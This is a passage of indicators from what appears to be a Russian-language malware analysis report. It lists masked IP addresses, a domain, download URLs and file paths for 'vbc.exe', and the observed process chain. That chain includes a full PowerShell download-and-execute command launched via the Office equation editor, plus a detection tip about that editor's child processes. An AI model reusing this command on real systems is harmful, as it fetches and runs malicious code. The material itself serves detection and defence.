Техническая информация
- '' (загружен из сети Интернет)
- 'C:\users\public\vbc.exe'
- http://19#.#3.251.109/kswbc/vbc.exe как %temp%\\vbc.exe
- C:\users\public\vbc.exe
- %TEMP%\vbc.exe
- '19#.#3.251.109':80
- 'im#.##ko.airforce':443
- http://19#.#3.251.109/windows/kswbc.exe
- http://19#.#3.251.109/kswbc/vbc.exe
- 'im#.##ko.airforce':443
- DNS ASK im#.##ko.airforce
- '%TEMP%\vbc.exe'
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('http://19#.#3.251.109/kswbc/vbc.exe', '%Temp%\\vbc.exe') & powershell Start-Process -FilePath '%Temp%\\vbc.exe' & exit (со скрытым окном)
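- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding (редактор формул Microsoft Office, запущенный как COM-сервер; по-видимому, именно от него в этой цепочке запускается cmd.exe, поэтому для обнаружения стоит отслеживать дочерние процессы eqnedt32.exe)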
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('http://19#.#3.251.109/kswbc/vbc.exe', '%Temp%\\vbc.exe') & powershell Start-Process -FilePath '%Temp%\\vbc.exe' & exit
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath '%TEMP%\\vbc.exe'